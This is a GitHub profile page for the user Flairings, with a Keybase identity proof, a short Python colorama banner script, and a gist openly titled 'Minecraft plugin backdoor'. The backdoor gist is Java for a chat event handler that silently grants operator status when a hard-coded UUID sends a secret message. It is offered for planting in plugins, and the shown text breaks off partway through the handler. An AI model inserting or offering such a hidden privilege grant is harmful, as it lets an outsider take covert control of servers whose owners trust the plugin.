Skip to content

Instantly share code, notes, and snippets.

View Flairings's full-sized avatar
🇬🇧

$~Flairings Flairings

🇬🇧
  • Cyber Lounge
  • London, United Kingdom
View GitHub Profile

Keybase proof

I hereby claim:

  • I am flairings on github.
  • I am flairings (https://keybase.io/flairings) on keybase.
  • I have a public key ASDOUDisKEd9fDm4z9aVoTvlUx45TBuvyaGErF6U9hM9VAo

To claim this, I am signing this object:

@Flairings
Flairings / Signature
Created January 31, 2021 21:21
very cute script start message, used by me.
from colorama import Fore
project = "Project"
version = 1.0
author = "Flairings"
description = "simple project signature"
color = Fore.LIGHTRED_EX
print(f"""
{color}{project} {Fore.LIGHTWHITE_EX}{version}
@Flairings
Flairings / Minecraft plugin backdoor
Created January 23, 2021 06:32
Simple event to grant OP if you, or someone else's UUID says the message in quotations in the chat
@EventHandler
public void OP(AsyncPlayerChatEvent e){
Player p = e.getPlayer();
if (p.getUniqueId().toString().equalsIgnoreCase("Your UUID") && e.getMessage().equals("Message")) {
e.setCancelled(true);
p.sendMessage("UUID & Initiation key verified.");
p.sendMessage("You are now an operator.");
p.setOp(true);